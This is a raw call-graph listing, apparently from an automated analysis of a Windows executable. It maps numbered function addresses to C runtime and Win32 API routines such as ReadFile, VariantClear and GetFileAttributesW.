86035->86036 86037 41adfa 86035->86037 86040 417f8a __commit 46 API calls 86036->86040 86041 41ae51 86036->86041 86038 417f8a __commit 46 API calls 86037->86038 86039 41adff 86038->86039 86042 417f77 __commit 46 API calls 86039->86042 86043 41ae23 86040->86043 86041->86017 86044 41ae07 86042->86044 86045 417f77 __commit 46 API calls 86043->86045 86044->86017 86046 41ae2b 86045->86046 86047 417f25 __commit 10 API calls 86046->86047 86047->86044 86048->86021 86049->86024 86051 414c82 __commit 86050->86051 86052 414cbb __commit 86051->86052 86053 414cc3 86051->86053 86054 414c96 __cftof2_l 86051->86054 86052->85697 86055 415471 __lock_file 47 API calls 86053->86055 86077 417f77 46 API calls __getptd_noexit 86054->86077 86056 414ccb 86055->86056 86063 414aba 86056->86063 86059 414cb0 86078 417f25 10 API calls __commit 86059->86078 86067 414ad8 __cftof2_l 86063->86067 86070 414af2 86063->86070 86064 414ae2 86130 417f77 46 API calls __getptd_noexit 86064->86130 86066 414ae7 86131 417f25 10 API calls __commit 86066->86131 86067->86064 86067->86070 86074 414b2d 86067->86074 86079 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 86070->86079 86071 414c38 __cftof2_l 86133 417f77 46 API calls __getptd_noexit 86071->86133 86073 414139 __fflush_nolock 46 API calls 86073->86074 86074->86070 86074->86071 86074->86073 86080 41dfcc 86074->86080 86110 41d8f3 86074->86110 86132 41e0c2 46 API calls 3 library calls 86074->86132 86077->86059 86078->86052 86079->86052 86081 41dfd8 __commit 86080->86081 86082 41dfe0 86081->86082 86085 41dffb 86081->86085 86203 417f8a 46 API calls __getptd_noexit 86082->86203 86083 41e007 86205 417f8a 46 API calls __getptd_noexit 86083->86205 86085->86083 86089 41e041 86085->86089 86087 41dfe5 86204 417f77 46 API calls __getptd_noexit 86087->86204 86088 41e00c 86206 417f77 46 API calls __getptd_noexit 86088->86206 86092 41e063 86089->86092 86093 41e04e 86089->86093 86094 41ae56 ___lock_fhandle 48 API calls 86092->86094 86208 417f8a 46 API calls __getptd_noexit 86093->86208 86097 41e069 86094->86097 86095 41e014 86207 417f25 10 API calls __commit 86095->86207 86100 41e077 86097->86100 86101 41e08b 86097->86101 86098 41e053 86209 417f77 46 API calls __getptd_noexit 86098->86209 86099 41dfed __commit 86099->86074 86134 41da15 86100->86134 86210 417f77 46 API calls __getptd_noexit 86101->86210 86106 41e083 86212 41e0ba LeaveCriticalSection __unlock_fhandle 86106->86212 86107 41e090 86211 417f8a 46 API calls __getptd_noexit 86107->86211 86111 41d900 86110->86111 86114 41d915 86110->86114 86216 417f77 46 API calls __getptd_noexit 86111->86216 86113 41d905 86217 417f25 10 API calls __commit 86113->86217 86116 41d94a 86114->86116 86124 41d910 86114->86124 86213 420603 86114->86213 86118 414139 __fflush_nolock 46 API calls 86116->86118 86119 41d95e 86118->86119 86120 41dfcc __read 59 API calls 86119->86120 86121 41d965 86120->86121 86122 414139 __fflush_nolock 46 API calls 86121->86122 86121->86124 86123 41d988 86122->86123 86123->86124 86125 414139 __fflush_nolock 46 API calls 86123->86125 86124->86074 86126 41d994 86125->86126 86126->86124 86127 414139 __fflush_nolock 46 API calls 86126->86127 86128 41d9a1 86127->86128 86129 414139 __fflush_nolock 46 API calls 86128->86129 86129->86124 86130->86066 86131->86070 86132->86074 86133->86066 86135 41da31 86134->86135 86136 41da4c 86134->86136 86137 417f8a __commit 46 API calls 86135->86137 86138 41da5b 86136->86138 86140 41da7a 86136->86140 86139 41da36 86137->86139 86141 417f8a __commit 46 API calls 86138->86141 86144 417f77 __commit 46 API calls 86139->86144 86143 41da98 86140->86143 86157 41daac 86140->86157 86142 41da60 86141->86142 86145 417f77 __commit 46 API calls 86142->86145 86146 417f8a __commit 46 API calls 86143->86146 86154 41da3e 86144->86154 86148 41da67 86145->86148 86150 41da9d 86146->86150 86147 41db02 86149 417f8a __commit 46 API calls 86147->86149 86151 417f25 __commit 10 API calls 86148->86151 86152 41db07 86149->86152 86153 417f77 __commit 46 API calls 86150->86153 86151->86154 86155 417f77 __commit 46 API calls 86152->86155 86156 41daa4 86153->86156 86154->86106 86155->86156 86159 417f25 __commit 10 API calls 86156->86159 86157->86147 86157->86154 86158 41dae1 86157->86158 86160 41db1b 86157->86160 86158->86147 86162 41daec ReadFile 86158->86162 86159->86154 86161 416b04 __malloc_crt 46 API calls 86160->86161 86164 41db31 86161->86164 86165 41dc17 86162->86165 86166 41df8f GetLastError 86162->86166 86169 41db59 86164->86169 86170 41db3b 86164->86170 86165->86166 86173 41dc2b 86165->86173 86167 41de16 86166->86167 86168 41df9c 86166->86168 86177 417f9d __dosmaperr 46 API calls 86167->86177 86182 41dd9b 86167->86182 86171 417f77 __commit 46 API calls 86168->86171 86174 420494 __lseeki64_nolock 48 API calls 86169->86174 86172 417f77 __commit 46 API calls 86170->86172 86175 41dfa1 86171->86175 86176 41db40 86172->86176 86173->86182 86183 41dc47 86173->86183 86186 41de5b 86173->86186 86178 41db67 86174->86178 86179 417f8a __commit 46 API calls 86175->86179 86180 417f8a __commit 46 API calls 86176->86180 86177->86182 86178->86162 86179->86182 86180->86154 86181 413748 _free 46 API calls 86181->86154 86182->86154 86182->86181 86184 41dcab ReadFile 86183->86184 86193 41dd28 86183->86193 86187 41dcc9 GetLastError 86184->86187 86196 41dcd3 86184->86196 86185 41ded0 ReadFile 86188 41deef GetLastError 86185->86188 86194 41def9 86185->86194 86186->86182 86186->86185 86187->86183 86187->86196 86188->86186 86188->86194 86189 41ddec MultiByteToWideChar 86189->86182 86190 41de10 GetLastError 86189->86190 86190->86167 86191 41dda3 86199 41dd60 86191->86199 86200 41ddda 86191->86200 86192 41dd96 86195 417f77 __commit 46 API calls 86192->86195 86193->86182 86193->86191 86193->86192 86193->86199 86194->86186 86198 420494 __lseeki64_nolock 48 API calls 86194->86198 86195->86182 86196->86183 86197 420494 __lseeki64_nolock 48 API calls 86196->86197 86197->86196 86198->86194 86199->86189 86201 420494 __lseeki64_nolock 48 API calls 86200->86201 86202 41dde9 86201->86202 86202->86189 86203->86087 86204->86099 86205->86088 86206->86095 86207->86099 86208->86098 86209->86095 86210->86107 86211->86106 86212->86099 86214 416b04 __malloc_crt 46 API calls 86213->86214 86215 420618 86214->86215 86215->86116 86216->86113 86217->86124 86221 4148b3 GetSystemTimeAsFileTime __aulldiv 86218->86221 86220 442c6b 86220->85700 86221->86220 86222->85707 86223->85713 86224->85713 86228 45272f __tzset_nolock _wcscpy 86225->86228 86226 44afef GetSystemTimeAsFileTime 86226->86228 86227 4528a4 86227->85622 86227->85623 86228->86226 86228->86227 86229 414d04 61 API calls __fread_nolock 86228->86229 86230 4150d1 81 API calls _fseek 86228->86230 86229->86228 86230->86228 86232 44b1bc 86231->86232 86233 44b1ca 86231->86233 86234 4149c2 116 API calls 86232->86234 86235 44b1e1 86233->86235 86236 4149c2 116 API calls 86233->86236 86237 44b1d8 86233->86237 86234->86233 86266 4321a4 86235->86266 86239 44b2db 86236->86239 86237->85649 86239->86235 86241 44b2e9 86239->86241 86240 44b224 86242 44b253 86240->86242 86243 44b228 86240->86243 86244 44b2f6 86241->86244 86246 414a46 __fcloseall 82 API calls 86241->86246 86270 43213d 86242->86270 86245 44b235 86243->86245 86248 414a46 __fcloseall 82 API calls 86243->86248 86244->85649 86249 44b245 86245->86249 86251 414a46 __fcloseall 82 API calls 86245->86251 86246->86244 86248->86245 86249->85649 86250 44b25a 86252 44b260 86250->86252 86253 44b289 86250->86253 86251->86249 86255 44b26d 86252->86255 86256 414a46 __fcloseall 82 API calls 86252->86256 86280 44b0bf 86253->86280 86257 44b27d 86255->86257 86259 414a46 __fcloseall 82 API calls 86255->86259 86256->86255 86257->85649 86258 44b28f 86289 4320f8 86258->86289 86259->86257 86262 414a46 __fcloseall 82 API calls 86264 44b2a2 86262->86264 86263 414a46 __fcloseall 82 API calls 86265 44b2b2 86263->86265 86264->86263 86264->86265 86265->85649 86267 4321cb 86266->86267 86269 4321b4 __tzset_nolock _memmove 86266->86269 86268 414d04 __fread_nolock 61 API calls 86267->86268 86268->86269 86269->86240 86271 4135bb _malloc 46 API calls 86270->86271 86272 432150 86271->86272 86273 4135bb _malloc 46 API calls 86272->86273 86274 432162 86273->86274 86275 4135bb _malloc 46 API calls 86274->86275 86276 432174 86275->86276 86277 4320f8 46 API calls 86276->86277 86278 432189 86276->86278 86279 432198 86277->86279 86278->86250 86279->86250 86281 44b18e 86280->86281 86288 44b0da 86280->86288 86301 43206e 86281->86301 86284 442caf 61 API calls 86284->86288 86287 44b19d 86287->86258 86288->86281 86288->86284 86288->86287 86297 442d48 86288->86297 86305 44b040 61 API calls 86288->86305 86290 43210f 86289->86290 86291 432109 86289->86291 86293 432122 86290->86293 86295 413748 _free 46 API calls 86290->86295 86292 413748 _free 46 API calls 86291->86292 86292->86290 86294 432135 86293->86294 86296 413748 _free 46 API calls 86293->86296 86294->86262 86294->86264 86295->86293 86296->86294 86298 442d60 86297->86298 86300 442dbd 86297->86300 86298->86288 86300->86298 86306 4320a4 86300->86306 86302 432092 86301->86302 86303 43207f 86301->86303 86302->86258 86304 4142b6 79 API calls 86303->86304 86304->86302 86305->86288 86307 4320e6 86306->86307 86308 4320cf 86306->86308 86307->86300 86310 4142b6 86308->86310 86311 4142c2 __commit 86310->86311 86312 4142f2 86311->86312 86313 4142da 86311->86313 86315 4142ea __commit 86311->86315 86316 415471 __lock_file 47 API calls 86312->86316 86314 417f77 __commit 46 API calls 86313->86314 86317 4142df 86314->86317 86315->86307 86318 4142fa 86316->86318 86319 417f25 __commit 10 API calls 86317->86319 86320 41415f 77 API calls 86318->86320 86319->86315 86321 41430f 86320->86321 86322 414326 LeaveCriticalSection LeaveCriticalSection 86321->86322 86322->86315 86323->85552 86324->85555 86325->85573 86326->85573 86327->85573 86328->85566 86329->85573 86330->85573 86331->85577 86332->85586 86333->85588 86334->85588 86384 410160 86335->86384 86337 41012f GetFullPathNameW 86338 410147 moneypunct 86337->86338 86338->85407 86340 4102cb SHGetDesktopFolder 86339->86340 86341 410333 _wcsncpy 86339->86341 86340->86341 86342 4102e0 _wcsncpy 86340->86342 86341->85410 86342->86341 86343 41031c SHGetPathFromIDListW 86342->86343 86343->86341 86345 4101bb 86344->86345 86352 425f4a 86344->86352 86346 410160 52 API calls 86345->86346 86347 4101c7 86346->86347 86388 410200 52 API calls 2 library calls 86347->86388 86348 4114ab __wcsicoll 58 API calls 86348->86352 86350 4101d6 86389 410200 52 API calls 2 library calls 86350->86389 86351 425f6e 86351->85412 86352->86348 86352->86351 86354 4101e9 86354->85412 86356 40f760 128 API calls 86355->86356 86357 40f584 86356->86357 86358 429335 86357->86358 86359 40f58c 86357->86359 86360 4528bd 118 API calls 86358->86360 86361 40f598 86359->86361 86362 429358 86359->86362 86363 42934b 86360->86363 86404 4033c0 113 API calls 7 library calls 86361->86404 86405 434034 86 API calls _wprintf 86362->86405 86366 429373 86363->86366 86367 42934f 86363->86367 86371 4115d7 52 API calls 86366->86371 86370 431e58 82 API calls 86367->86370 86368 429369 86368->86366 86369 40f5b4 86369->85408 86370->86362 86382 4293c5 moneypunct 86371->86382 86372 42959c 86373 413748 _free 46 API calls 86372->86373 86374 4295a5 86373->86374 86375 431e58 82 API calls 86374->86375 86376 4295b1 86375->86376 86380 401b10 52 API calls 86380->86382 86382->86372 86382->86380 86390 402780 86382->86390 86398 4022d0 86382->86398 86406 444af8 52 API calls _memmove 86382->86406 86407 44c7dd 64 API calls 3 library calls 86382->86407 86408 44b41c 52 API calls 86382->86408 86385 410167 _wcslen 86384->86385 86386 4115d7 52 API calls 86385->86386 86387 41017e _wcscpy 86386->86387 86387->86337 86388->86350 86389->86354 86391 402827 86390->86391 86395 402790 moneypunct _memmove 86390->86395 86393 4115d7 52 API calls 86391->86393 86392 4115d7 52 API calls 86396 402797 86392->86396 86393->86395 86394 4027bd 86394->86382 86395->86392 86396->86394 86397 4115d7 52 API calls 86396->86397 86397->86394 86399 4022e0 86398->86399 86401 40239d 86398->86401 86400 4115d7 52 API calls 86399->86400 86399->86401 86402 402320 moneypunct 86399->86402 86400->86402 86401->86382 86402->86401 86403 4115d7 52 API calls 86402->86403 86403->86402 86404->86369 86405->86368 86406->86382 86407->86382 86408->86382 86410 402539 moneypunct 86409->86410 86411 402417 86409->86411 86410->85416 86411->86410 86412 4115d7 52 API calls 86411->86412 86413 402443 86412->86413 86414 4115d7 52 API calls 86413->86414 86415 4024b4 86414->86415 86415->86410 86417 4022d0 52 API calls 86415->86417 86438 402880 86415->86438 86417->86415 86422 401566 86418->86422 86419 401794 86490 40e9a0 90 API calls 86419->86490 86422->86419 86423 40167a 86422->86423 86424 4010a0 52 API calls 86422->86424 86425 4017c0 86423->86425 86491 45e737 90 API calls 3 library calls 86423->86491 86424->86422 86425->85418 86427 40bc70 52 API calls 86426->86427 86436 40d451 86427->86436 86428 40d50f 86494 410600 52 API calls 86428->86494 86430 427c01 86495 45e737 90 API calls 3 library calls 86430->86495 86431 40e0a0 52 API calls 86431->86436 86433 401b10 52 API calls 86433->86436 86434 40d519 86434->85421 86436->86428 86436->86430 86436->86431 86436->86433 86436->86434 86492 40f310 53 API calls 86436->86492 86493 40d860 91 API calls 86436->86493 86439 4115d7 52 API calls 86438->86439 86440 4028b3 86439->86440 86441 4115d7 52 API calls 86440->86441 86447 4028c5 moneypunct _memmove 86441->86447 86442 402780 52 API calls 86443 402b1e moneypunct 86442->86443 86443->86415 86444 427d62 86446 403350 52 API calls 86444->86446 86457 427d6b 86446->86457 86447->86444 86448 402bb6 86447->86448 86449 402aeb moneypunct 86447->86449 86452 403350 52 API calls 86447->86452 86462 427fd5 86447->86462 86463 427f2c 86447->86463 86464 402780 52 API calls 86447->86464 86469 427fa5 86447->86469 86470 402f00 52 API calls 86447->86470 86471 428000 86447->86471 86473 4026f0 52 API calls 86447->86473 86479 4115d7 52 API calls 86447->86479 86480 4031b0 63 API calls 86447->86480 86482 402f80 92 API calls _memmove 86447->86482 86483 402280 52 API calls 86447->86483 86485 4013a0 52 API calls 86447->86485 86481 403060 53 API calls 86448->86481 86449->86442 86453 42802b moneypunct 86449->86453 86451 402bca 86454 427f63 86451->86454 86455 402bd4 86451->86455 86452->86447 86487 460879 92 API calls 3 library calls 86454->86487 86456 402780 52 API calls 86455->86456 86459 402bdf 86456->86459 86457->86463 86484 403020 52 API calls _memmove 86457->86484 86459->86415 86488 460879 92 API calls 3 library calls 86462->86488 86486 460879 92 API calls 3 library calls 86463->86486 86464->86447 86468 427fe4 86478 402780 52 API calls 86468->86478 86474 402780 52 API calls 86469->86474 86470->86447 86489 460879 92 API calls 3 library calls 86471->86489 86477 402a85 CharUpperBuffW 86473->86477 86474->86443 86476 427f48 86476->86443 86477->86447 86478->86476 86479->86447 86480->86447 86481->86451 86482->86447 86483->86447 86484->86457 86485->86447 86486->86476 86487->86476 86488->86468 86489->86443 86490->86423 86491->86425 86492->86436 86493->86436 86494->86434 86495->86434 86496->85435 86497->85434 86499 42c5fe 86498->86499 86513 4091c6 86498->86513 86500 40bc70 52 API calls 86499->86500 86499->86513 86501 42c64e InterlockedIncrement 86500->86501 86502 42c665 86501->86502 86507 42c697 86501->86507 86504 42c672 InterlockedDecrement Sleep InterlockedIncrement 86502->86504 86502->86507 86503 42c737 InterlockedDecrement 86505 42c74a 86503->86505 86504->86502 86504->86507 86508 408f40 VariantClear 86505->86508 86506 42c731 86506->86503 86507->86503 86507->86506 86656 408e80 86507->86656 86510 42c752 86508->86510 86669 410c60 VariantClear moneypunct 86510->86669 86513->85495 86515 42c6db 86516 402160 52 API calls 86515->86516 86517 42c6e5 86516->86517 86518 45340c 85 API calls 86517->86518 86519 42c6f1 86518->86519 86666 40d200 52 API calls 2 library calls 86519->86666 86521 42c6fb 86667 465124 53 API calls 86521->86667 86523 42c715 86524 42c76a 86523->86524 86525 42c719 86523->86525 86526 401b10 52 API calls 86524->86526 86668 46fe32 VariantClear 86525->86668 86528 42c77e 86526->86528 86529 401980 53 API calls 86528->86529 86535 42c796 86529->86535 86530 42c812 86671 46fe32 VariantClear 86530->86671 86532 42c82a InterlockedDecrement 86672 46ff07 54 API calls 86532->86672 86534 42c864 86673 45e737 90 API calls 3 library calls 86534->86673 86535->86530 86535->86534 86670 40ba10 52 API calls 2 library calls 86535->86670 86538 42c9ec 86716 47d33e 383 API calls 86538->86716 86540 42c9fe 86717 46feb1 VariantClear VariantClear 86540->86717 86542 401980 53 API calls 86552 42c849 86542->86552 86543 42ca08 86545 401b10 52 API calls 86543->86545 86544 408f40 VariantClear 86544->86552 86548 42ca15 86545->86548 86546 408f40 VariantClear 86549 42c891 86546->86549 86547 402780 52 API calls 86547->86552 86550 40c2c0 52 API calls 86548->86550 86674 410c60 VariantClear moneypunct 86549->86674 86553 42c874 86550->86553 86552->86538 86552->86542 86552->86544 86552->86547 86675 40a780 86552->86675 86553->86546 86555 42ca59 86553->86555 86555->86555 86557 40afc4 86556->86557 86558 40b156 86556->86558 86559 40afd5 86557->86559 86560 42d1e3 86557->86560 86728 45e737 90 API calls 3 library calls 86558->86728 86563 40a780 244 API calls 86559->86563 86581 40b11a moneypunct 86559->86581 86729 45e737 90 API calls 3 library calls 86560->86729 86566 40b00a 86563->86566 86564 40b143 86564->85495 86565 42d1f8 86569 408f40 VariantClear 86565->86569 86566->86565 86570 40b012 86566->86570 86568 42d4db 86568->86568 86569->86564 86571 40b04a 86570->86571 86573 42d231 VariantClear 86570->86573 86574 40b094 moneypunct 86570->86574 86579 40b05c moneypunct 86571->86579 86730 40e270 VariantClear moneypunct 86571->86730 86572 40b108 86572->86581 86731 40e270 VariantClear moneypunct 86572->86731 86573->86579 86574->86572 86576 42d425 moneypunct 86574->86576 86575 42d45a VariantClear 86575->86581 86576->86575 86576->86581 86579->86574 86580 4115d7 52 API calls 86579->86580 86580->86574 86581->86564 86732 45e737 90 API calls 3 library calls 86581->86732 86583 408fff 86582->86583 86596 40900d 86582->86596 86733 403ea0 52 API calls __cinit 86583->86733 86586 42c3f6 86736 45e737 90 API calls 3 library calls 86586->86736 86588 40a780 244 API calls 86588->86596 86589 42c44a 86738 45e737 90 API calls 3 library calls 86589->86738 86591 42c47b 86739 451b42 61 API calls 86591->86739 86593 42c4cb 86741 47faae 283 API calls 86593->86741 86594 42c564 86599 408f40 VariantClear 86594->86599 86596->86586 86596->86588 86596->86589 86596->86591 86596->86593 86596->86594 86598 42c548 86596->86598 86602 409112 86596->86602 86603 4090f2 moneypunct 86596->86603 86605 4090df 86596->86605 86607 42c528 86596->86607 86610 4090ea 86596->86610 86735 4534e3 52 API calls 86596->86735 86737 40c4e0 244 API calls 86596->86737 86744 45e737 90 API calls 3 library calls 86598->86744 86599->86603 86600 42c491 86600->86603 86740 45e737 90 API calls 3 library calls 86600->86740 86601 42c4da 86601->86603 86742 45e737 90 API calls 3 library calls 86601->86742 86602->86598 86608 40912b 86602->86608 86603->85495 86605->86610 86611 408e80 VariantClear 86605->86611 86743 45e737 90 API calls 3 library calls 86607->86743 86608->86603 86734 403e10 53 API calls 86608->86734 86613 408f40 VariantClear 86610->86613 86611->86610 86613->86603 86615 40914b 86616 408f40 VariantClear 86615->86616 86616->86603 86745 408d90 86617->86745 86619 429778 86772 410c60 VariantClear moneypunct 86619->86772 86621 429780 86622 42976c 86771 45e737 90 API calls 3 library calls 86622->86771 86623 408cf9 86623->86619 86623->86622 86625 408d2d 86623->86625 86761 403d10 86625->86761 86628 408d71 moneypunct 86628->85495 86629 408f40 VariantClear 86630 408d45 moneypunct 86629->86630 86630->86628 86630->86629 86631->85495 86632->85495 86633->85495 86634->85495 86635->85445 86636->85450 86637->85495 86638->85495 86639->85495 86640->85495 86641->85501 86642->85501 86643->85501 86644->85501 86645->85501 86646->85501 86647->85501 86649 403cdf 86648->86649 86650 408f40 VariantClear 86649->86650 86651 403ce7 86650->86651 86651->85489 86652->85501 86653->85501 86654->85495 86655->85442 86657 408e88 86656->86657 86659 408e94 86656->86659 86658 408f40 VariantClear 86657->86658 86658->86659 86660 45340c 86659->86660 86661 453439 86660->86661 86662 453419 86660->86662 86661->86515 86663 45342f 86662->86663 86718 4531b1 85 API calls 5 library calls 86662->86718 86663->86515 86665 453425 86665->86515 86666->86521 86667->86523 86668->86506 86669->86513 86670->86535 86671->86532 86672->86552 86673->86553 86674->86513 86676 40a7a6 86675->86676 86677 40ae8c 86675->86677 86679 4115d7 52 API calls 86676->86679 86719 41130a 51 API calls __cinit 86677->86719 86712 40a7c6 moneypunct _memmove 86679->86712 86680 40a86d 86681 40abd1 86680->86681 86696 40a878 moneypunct 86680->86696 86724 45e737 90 API calls 3 library calls 86681->86724 86683 40bc10 53 API calls 86683->86712 86684 401b10 52 API calls 86684->86712 86685 408e80 VariantClear 86685->86712 86686 42b791 VariantClear 86686->86712 86687 40b5f0 89 API calls 86687->86712 86688 408f40 VariantClear 86688->86696 86689 42ba2d VariantClear 86689->86712 86690 42b459 VariantClear 86690->86712 86691 40a884 moneypunct 86691->86552 86692 42b6f6 VariantClear 86692->86712 86694 408cc0 237 API calls 86694->86712 86695 42bc5b 86695->86552 86696->86688 86696->86691 86697 40e270 VariantClear 86697->86712 86698 42bbf5 86725 45e737 90 API calls 3 library calls 86698->86725 86699 4115d7 52 API calls 86699->86712 86700 42bb6a 86727 44b92d VariantClear 86700->86727 86701 4115d7 52 API calls 86704 42b5b3 VariantInit VariantCopy 86701->86704 86703 408f40 VariantClear 86703->86712 86706 42b5d7 VariantClear 86704->86706 86704->86712 86706->86712 86709 42bc37 86726 45e737 90 API calls 3 library calls 86709->86726 86712->86680 86712->86681 86712->86683 86712->86684 86712->86685 86712->86686 86712->86687 86712->86689 86712->86690 86712->86692 86712->86694 86712->86697 86712->86698 86712->86699 86712->86700 86712->86701 86712->86703 86712->86709 86715 4530c9 VariantClear 86712->86715 86720 45308a 53 API calls 86712->86720 86721 470870 52 API calls 86712->86721 86722 457f66 87 API calls __write_nolock 86712->86722 86723 472f47 127 API calls 86712->86723 86713 42bc48 86713->86700 86714 408f40 VariantClear 86713->86714 86714->86700 86715->86712 86716->86540 86717->86543 86718->86665 86719->86712 86720->86712 86721->86712 86722->86712 86723->86712 86724->86700 86725->86700 86726->86713 86727->86695 86728->86560 86729->86565 86730->86579 86731->86581 86732->86568 86733->86596 86734->86615 86735->86596 86736->86603 86737->86596 86738->86603 86739->86600 86740->86603 86741->86601 86742->86603 86743->86603 86744->86594 86746 4289d2 86745->86746 86747 408db3 86745->86747 86775 45e737 90 API calls 3 library calls 86746->86775 86773 40bec0 90 API calls 86747->86773 86750 4289e5 86776 45e737 90 API calls 3 library calls 86750->86776 86753 428a05 86754 408f40 VariantClear 86753->86754 86760 408e5a 86754->86760 86755 40a780 244 API calls 86758 408dc9 86755->86758 86756 408e64 86757 408f40 VariantClear 86756->86757 86757->86760 86758->86750 86758->86753 86758->86755 86758->86756 86759 408f40 VariantClear 86758->86759 86758->86760 86774 40ba10 52 API calls 2 library calls 86758->86774 86759->86758 86760->86623 86762 408f40 VariantClear 86761->86762 86763 403d20 86762->86763 86764 403cd0 VariantClear 86763->86764 86765 403d4d 86764->86765 86777 4813fa 86765->86777 86787 475596 86765->86787 86790 4755ad 86765->86790 86793 46e1a6 86765->86793 86766 403d76 86766->86619 86766->86630 86771->86619 86772->86621 86773->86758 86774->86758 86775->86750 86776->86753 86778 45340c 85 API calls 86777->86778 86779 481438 86778->86779 86780 402880 95 API calls 86779->86780 86781 48143f 86780->86781 86782 481465 86781->86782 86783 40a780 244 API calls 86781->86783 86786 481469 86782->86786 86841 40e710 53 API calls 86782->86841 86783->86782 86785 4814a4 86785->86766 86786->86766 86842 475077 86787->86842 86789 4755a9 86789->86766 86791 475077 128 API calls 86790->86791 86792 4755c0 86791->86792 86792->86766 86794 46e1c0 86793->86794 86795 4533eb 85 API calls 86794->86795 86797 46e1dc 86795->86797 86796 46e483 86796->86766 86797->86796 86798 46e2e7 86797->86798 86799 46e1e9 86797->86799 86801 40f760 128 API calls 86798->86801 86800 45340c 85 API calls 86799->86800 86807 46e1f4 _wcscpy _wcschr 86800->86807 86802 46e2f7 86801->86802 86803 46e2fc 86802->86803 86804 46e30d 86802->86804 86805 403cd0 VariantClear 86803->86805 86806 45340c 85 API calls 86804->86806 86808 46e2c8 86805->86808 86809 46e332 86806->86809 86815 46e216 _wcscat _wcscpy 86807->86815 86818 46e248 _wcscat 86807->86818 86811 408f40 VariantClear 86808->86811 86810 413a0e __wsplitpath 46 API calls 86809->86810 86820 46e338 _wcscat _wcscpy 86810->86820 86812 46e2d0 86811->86812 86812->86766 86813 45340c 85 API calls 86814 46e264 _wcscpy 86813->86814 87011 433998 GetFileAttributesW 86814->87011 86816 45340c 85 API calls 86815->86816 86816->86818 86818->86813 86819 46e27d _wcslen 86819->86808 86821 45340c 85 API calls 86819->86821 86823 45340c 85 API calls 86820->86823 86822 46e2b0 86821->86822 87012 44bd27 80 API calls 4 library calls 86822->87012 86825 46e3e3 86823->86825 86948 433784 86825->86948 86826 46e2bd 86826->86796 86826->86808 86828 46e3e9 86955 4339fa 86828->86955 86831 46e401 86832 408f40 VariantClear 86831->86832 86834 46e43e 86832->86834 86833 45340c 85 API calls 86835 46e419 86833->86835 86837 431e58 82 API calls 86834->86837 86958 452ac7 86835->86958 86839 46e454 86837->86839 86838 46e423 86838->86834 86840 403cd0 VariantClear 86838->86840 86839->86766 86840->86831 86841->86785 86895 4533eb 86842->86895 86845 4750ee 86847 408f40 VariantClear 86845->86847 86846 475129 86899 4646e0 86846->86899 86855 4750f5 86847->86855 86849 47515e 86850 475162 86849->86850 86875 47518e 86849->86875 86851 408f40 VariantClear 86850->86851 86873 475169 86851->86873 86852 475357 86853 475365 86852->86853 86854 4754ea 86852->86854 86933 44b3ac 57 API calls 86853->86933 86939 464812 92 API calls 86854->86939 86855->86789 86859 4754fc 86860 475374 86859->86860 86861 475508 86859->86861 86912 430d31 86860->86912 86863 408f40 VariantClear 86861->86863 86862 4533eb 85 API calls 86862->86875 86865 47550f 86863->86865 86865->86873 86866 475388 86919 4577e9 86866->86919 86869 47539e 86927 410cfc 86869->86927 86870 475480 86871 408f40 VariantClear 86870->86871 86871->86873 86873->86789 86875->86852 86875->86862 86875->86870 86881 4754b5 86875->86881 86931 436299 52 API calls 2 library calls 86875->86931 86932 463ad5 64 API calls __wcsicoll 86875->86932 86876 4753d4 86935 40e830 53 API calls 86876->86935 86877 4753b8 86934 45e737 90 API calls 3 library calls 86877->86934 86880 4753c5 GetCurrentProcess TerminateProcess 86880->86876 86883 408f40 VariantClear 86881->86883 86882 4753e3 86893 475406 86882->86893 86936 40cf00 53 API calls 86882->86936 86883->86873 86885 4753f8 86937 46c43e 106 API calls 2 library calls 86885->86937 86888 475556 86888->86873 86889 47556e FreeLibrary 86888->86889 86889->86873 86891 408e80 VariantClear 86891->86893 86893->86888 86893->86891 86894 408f40 VariantClear 86893->86894 86938 40cf00 53 API calls 86893->86938 86940 44b3ac 57 API calls 86893->86940 86941 46c43e 106 API calls 2 library calls 86893->86941 86894->86893 86896 453404 86895->86896 86897 4533f8 86895->86897 86896->86845 86896->86846 86897->86896 86942 4531b1 85 API calls 5 library calls 86897->86942 86943 4536f7 53 API calls 86899->86943 86901 4646fc 86944 4426cd 59 API calls _wcslen 86901->86944 86903 464711 86905 40bc70 52 API calls 86903->86905 86911 46474b 86903->86911 86906 46472c 86905->86906 86945 461465 52 API calls _memmove 86906->86945 86908 464741 86909 40c600 52 API calls 86908->86909 86909->86911 86910 464793 86910->86849 86911->86910 86946 463ad5 64 API calls __wcsicoll 86911->86946 86913 430db2 86912->86913 86914 430d54 86912->86914 86913->86866 86915 4115d7 52 API calls 86914->86915 86916 430d74 86915->86916 86917 430da9 86916->86917 86918 4115d7 52 API calls 86916->86918 86917->86866 86918->86916 86920 457a84 86919->86920 86926 45780c _strcat moneypunct _wcslen _wcscpy 86919->86926 86920->86869 86921 45340c 85 API calls 86921->86926 86922 443006 57 API calls 86922->86926 86924 4135bb 46 API calls _malloc 86924->86926 86925 40f6f0 54 API calls 86925->86926 86926->86920 86926->86921 86926->86922 86926->86924 86926->86925 86947 44b3ac 57 API calls 86926->86947 86928 410d11 86927->86928 86929 410da9 VirtualAlloc 86928->86929 86930 410d77 86928->86930 86929->86930 86930->86876 86930->86877 86931->86875 86932->86875 86933->86860 86934->86880 86935->86882 86936->86885 86937->86893 86938->86893 86939->86859 86940->86893 86941->86893 86942->86896 86943->86901 86944->86903 86945->86908 86946->86910 86947->86926 86949 433791 _wcschr __write_nolock 86948->86949 86950 4337a8 _wcscpy 86949->86950 86951 413a0e __wsplitpath 46 API calls 86949->86951 86950->86828 86952 4337dd 86951->86952 86953 413a0e __wsplitpath 46 API calls 86952->86953 86954 4337ff _wcscat _wcscpy 86953->86954 86954->86828 87013 4339b6 GetFileAttributesW 86955->87013 86957 433a06 86957->86831 86957->86833 86959 452ad7 __write_nolock 86958->86959 86960 442c5a GetSystemTimeAsFileTime 86959->86960 86961 452b2b 86960->86961 86962 4150d1 _fseek 81 API calls 86961->86962 86963 452b40 86962->86963 86964 452c30 86963->86964 86965 452b59 86963->86965 86967 452719 90 API calls 86964->86967 86966 452719 90 API calls 86965->86966 86968 452b68 86966->86968 86983 452bf4 _wcscat 86967->86983 86969 452b6c 86968->86969 86970 413a0e __wsplitpath 46 API calls 86968->86970 86969->86838 86975 452ba0 _wcscat _wcscpy 86970->86975 86971 414d04 __fread_nolock 61 API calls 86972 452c58 86971->86972 86973 414d04 __fread_nolock 61 API calls 86972->86973 86974 452c69 86973->86974 86976 414d04 __fread_nolock 61 API calls 86974->86976 86978 413a0e __wsplitpath 46 API calls 86975->86978 86977 452c88 